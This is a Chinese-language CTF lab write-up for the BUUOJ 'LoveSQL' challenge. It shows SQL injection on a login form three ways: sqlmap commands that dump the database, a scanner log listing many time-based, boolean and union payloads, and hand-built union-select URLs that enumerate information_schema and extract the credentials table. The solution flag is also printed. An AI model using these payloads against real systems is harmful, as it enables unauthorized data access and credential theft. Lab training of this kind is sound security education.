【sql常见注入方法3种】--靶场lovesql

---

前言

当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求，如果权限验证通过就会执行 Sql 语句。
这种网站内部直接发送的Sql请求一般不会有危险，但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句，如果用户输入的数据被构造成恶意 Sql 代码，Web 应用又未对动态构造的 Sql 语句使用的参数进行审查，则会带来意想不到的危险。

一、使用sqlmap爆flag

1.结合burp抓包进行爆破

Ⅰ.使用burp进行抓包，将抓取文件保存至sqlmap目录下

使用burp抓取数据包，保存为1.txt保存到sqlmap目录下

抓包时记得抓取存在注入点的包–输入账号密码后发送的请求包

GET /check.php?username=1&password=1 HTTP/1.1
Host: 1d71be1c-6948-47f6-9f38-d8cda8f66762.node4.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://1d71be1c-6948-47f6-9f38-d8cda8f66762.node4.buuoj.cn:81/
Upgrade-Insecure-Requests: 1

Ⅱ.在当前目录输入cmd并调取命令

获取数据库

python sqlmap.py -r 1.txt --dbs

得到数据库列表如下，猜flag可能在geek库当中

Ⅲ.获取表

输入命令：

python sqlmap.py -r 1.txt -D geek --tables

得到l0ve1ysq1这个表

Ⅳ.获取列

输入命令:

python sqlmap.py -r 1.txt -D geek -T l0ve1ysq1 --columns

得到仨列内容，下面就是获取当中的flag了

Ⅴ.获取flag

输入命令：

python sqlmap.py -r 1.txt -D geek -T l0ve1ysq1 -C id,password,username --dump

得到flag如下：

flag{58703d1e-c8af-4f08-8820-869f89a00fd9}

2.对存在注入点的网页直接使用sqlmap

其他步骤一样就是会遇到报错，加个命令即可

python sqlmap.py -u "http://1d71be1c-6948-47f6-9f38-d8cda8f66762.node4.buuoj.cn:81/check.php?username=1&password=1" --dbs  --random-agent --risk 3

最终得到flag

最终命令：

python sqlmap.py -u "http://1d71be1c-6948-47f6-9f38-d8cda8f66762.node4.buuoj.cn:81/check.php?username=1&password=1" --dbs  --random-agent --risk 3 -D geek -T l0ve1ysq1 -C id,password,username --dump

二、使用可视化工具注入

1.抓包并执行

代码如下（示例）：

自动加载当前固定代理配置成功！----2022/9/2 16:21:11
自动加载上次配置成功！----2022/9/2 16:21:11
自动加载上次代理池配置成功，发现代理：1个！----2022/9/2 16:21:11
自动检查更新，没有发现新版本！----2022/9/2 16:21:12
自动识别网页编码为：“UTF-8”----2022/9/2 16:23:21
报告大侠，发现2个参数，请稍候正在对每一个参数进行注入测试！----2022/9/2 16:23:21
报告大侠，正在对参数username进行盲注测试！----2022/9/2 16:23:21
自动选择数据库类型完成！----2022/9/2 16:23:21
通过错误显示信息，发现数据库为MySQL！----2022/9/2 16:23:21
正在测试PayLoad: if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:22
正在测试PayLoad:' if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:22
正在测试PayLoad:;if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:22
正在测试PayLoad:';if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:22
正在测试PayLoad:');if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:22
正在测试PayLoad:);if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:22
正在测试PayLoad: and (select 1 from (select(sleep(2-(if((1=1), 0, 2)))))test)#----2022/9/2 16:23:22
正在测试PayLoad:) and (select 1 from (select(sleep(2-(if((1=1), 0, 2)))))test)#----2022/9/2 16:23:23
正在测试PayLoad:' and (select 1 from (select(sleep(2-(if((1=1), 0, 2)))))test)#----2022/9/2 16:23:23
自动选择数据库类型完成！----2022/9/2 16:23:27
测试可能存在延时注入:' and (select 1 from (select(sleep(2-(if((1=1), 0, 2)))))test)#----数据库类型：MySQL----2022/9/2 16:23:27
正在测试PayLoad: and 1=1： and 1=2：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:27
正在测试PayLoad:' or (1=1) and 'a'='a：' or (1=2) and 'a'='a：Bool OR字符型SQL注入：1=1----2022/9/2 16:23:27
正在测试PayLoad: and 1=1#： and 1=2#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:27
正在测试PayLoad:' and 1=1#：' and 1=2#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:27
正在测试PayLoad: and 1=1-- -： and 1=2-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:27
正在测试PayLoad:' and 1=1-- -：' and 1=2-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:27
正在测试PayLoad: or(1=1)-- -： or(1=2)-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:27
正在测试PayLoad:' or(1=1)#：' or(1=2)#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:27
正在测试PayLoad:' and 1=1 and 'a'='a：' and 1=2 and 'a'='a：Bool AND字符型SQL注入：1=1----2022/9/2 16:23:28
正在测试PayLoad:%' and 1=1 and '%'='：%' and 1=2 and '%'='：Bool AND搜索型SQL注入('%xx%')：1=1----2022/9/2 16:23:28
正在测试PayLoad:') and 1=1 and ('1'='1：') and 1=2 and ('1'='1：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:28
正在测试PayLoad:) or(1=1)-- -：) or(1=2)-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:28
正在测试PayLoad:') or(1=1)#：') or(1=2)#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:28
正在测试PayLoad:) and 1=1-- -：) and 1=2-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:28
正在测试PayLoad:') and 1=1#：') and 1=2#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:28
正在测试PayLoad:) and 1=1 and (2=2：) and 1=2 and (2=2：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:28
正在测试PayLoad:') as tempxtestxtable where 1=1-- -：') as tempxtestxtable where 1=2-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:29
报告大侠，盲注测试完成，正在进行错误显示注入测试！----2022/9/2 16:23:29
发现MySQL错误显示注入----2022/9/2 16:23:29
自动选择数据库类型完成！----2022/9/2 16:23:29
自动标记错误显示注入完成！----2022/9/2 16:23:29
报告大侠，错误显示测试完成，正在进行Union注入测试！----2022/9/2 16:23:29
此注入点支持Union注入，自动选择注入方式完成！----2022/9/2 16:23:30
自动选择数据库类型完成！----2022/9/2 16:23:30
报告大侠，正在对参数password进行盲注测试！----2022/9/2 16:23:30
自动选择数据库类型完成！----2022/9/2 16:23:30
通过错误显示信息，发现数据库为MySQL！----2022/9/2 16:23:30
正在测试PayLoad: if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:30
正在测试PayLoad:' if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:30
正在测试PayLoad:;if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:30
正在测试PayLoad:';if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:30
正在测试PayLoad:');if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:31
正在测试PayLoad:);if(1=1) waitfor delay '0:0:2'------2022/9/2 16:23:31
正在测试PayLoad: and (select 1 from (select(sleep(2-(if((1=1), 0, 2)))))test)#----2022/9/2 16:23:31
正在测试PayLoad:) and (select 1 from (select(sleep(2-(if((1=1), 0, 2)))))test)#----2022/9/2 16:23:31
正在测试PayLoad:' and (select 1 from (select(sleep(2-(if((1=1), 0, 2)))))test)#----2022/9/2 16:23:31
自动选择数据库类型完成！----2022/9/2 16:23:35
测试可能存在延时注入:' and (select 1 from (select(sleep(2-(if((1=1), 0, 2)))))test)#----数据库类型：MySQL----2022/9/2 16:23:35
正在测试PayLoad: and 1=1： and 1=2：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:35
正在测试PayLoad:' or (1=1) and 'a'='a：' or (1=2) and 'a'='a：Bool OR字符型SQL注入：1=1----2022/9/2 16:23:35
正在测试PayLoad: and 1=1#： and 1=2#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:35
正在测试PayLoad:' and 1=1#：' and 1=2#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:35
正在测试PayLoad: and 1=1-- -： and 1=2-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:36
正在测试PayLoad:' and 1=1-- -：' and 1=2-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:36
正在测试PayLoad: or(1=1)-- -： or(1=2)-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:36
正在测试PayLoad:' or(1=1)#：' or(1=2)#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:36
正在测试PayLoad:' and 1=1 and 'a'='a：' and 1=2 and 'a'='a：Bool AND字符型SQL注入：1=1----2022/9/2 16:23:36
正在测试PayLoad:%' and 1=1 and '%'='：%' and 1=2 and '%'='：Bool AND搜索型SQL注入('%xx%')：1=1----2022/9/2 16:23:36
正在测试PayLoad:') and 1=1 and ('1'='1：') and 1=2 and ('1'='1：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:36
正在测试PayLoad:) or(1=1)-- -：) or(1=2)-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:36
正在测试PayLoad:') or(1=1)#：') or(1=2)#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:36
正在测试PayLoad:) and 1=1-- -：) and 1=2-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:37
正在测试PayLoad:') and 1=1#：') and 1=2#：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:37
正在测试PayLoad:) and 1=1 and (2=2：) and 1=2 and (2=2：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:37
正在测试PayLoad:') as tempxtestxtable where 1=1-- -：') as tempxtestxtable where 1=2-- -：Bool AND数字型SQL注入：1=1----2022/9/2 16:23:37
报告大侠，盲注测试完成，正在进行错误显示注入测试！----2022/9/2 16:23:37
发现MySQL错误显示注入----2022/9/2 16:23:38
自动选择数据库类型完成！----2022/9/2 16:23:38
自动标记错误显示注入完成！----2022/9/2 16:23:38
报告大侠，错误显示测试完成，正在进行Union注入测试！----2022/9/2 16:23:38
此注入点支持Union注入，自动选择注入方式完成！----2022/9/2 16:23:38
自动选择数据库类型完成！----2022/9/2 16:23:38
注入测试完成！----2022/9/2 16:23:38

2.填好相关数据，爆破flag

得到flag如下：

flag{58703d1e-c8af-4f08-8820-869f89a00fd9}

不推荐一直用可视化工具，虽然好用，整个流程半分钟

三.手工注入

第一步 实验报错

实验，看看输入1 1’是否会报错，发现1’报错
直接上万能密码：（详细可看上一个整理的万能密码表）
注意：需要用#注释掉。

1' or 1=1;#

第二步 构造url，实验字段数

原url：http://1d71be1c-6948-47f6-9f38-d8cda8f66762.node4.buuoj.cn:81/check.php?username=1%27+or+1%3D1%3B%23&password=1
/check.php?username=1' order by 3%23&password=1     # 存在
/check.php?username=1' order by 4%23&password=1     # 报错

因此，得到总共有三个字段数

注意：url中存在url编码，特殊注释字符应当用url编码表示，此题中#用23%表示。

第三步 查询测试注入点，查看回显点

构造url，得到回显点

/check.php?username=1' union select 1,2,3%23&password=1

很明显，2和3都是注入点，而且没有过滤，接下来直接写命令了。

/check.php?username=1' union select 1,database(),3%23&password=ads

得到数据库名：geek

第四步 此时查看数据库中的表，构造url

/check.php?username=1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

或者：

/check.php?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=ads

此时得到database中的两个表，分别是geekuser,10ve1ysq1

information_schema 表介绍

第一个查询看看库里有多少个表，表名等 select * from INFORMATION_SCHEMA.TABLES

information_schema这张数据表保存了MySQL服务器所有数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。

再简单点，这台MySQL服务器上，到底有哪些数据库、各个数据库有哪些表，每张表的字段类型是什么，各个数据库要什么权限才能访问，等等信息都保存在information_schema表里面。

Mysql的INFORMATION_SCHEMA数据库包含了一些表和视图，提供了访问数据库元数据的方式。

元数据是关于数据的数据，如数据库名或表名，列的数据类型，或访问权限等。有些时候用于表述该信息的其他术语包括“数据词典”和“系统目录”。

第五步 查看一下表中的字段

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

或者：

/check.php?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=ads

得到的是l0ve1ysq1中的三个字段

第六步 查看字段中的数据

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

或者：

/check.php?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=ads

得到flag{58703d1e-c8af-4f08-8820-869f89a00fd9}

---

总结

每个靶场题目建议多换几种思路，要不然到了ctf比赛一旦卡壳就坏事。
靶场：链接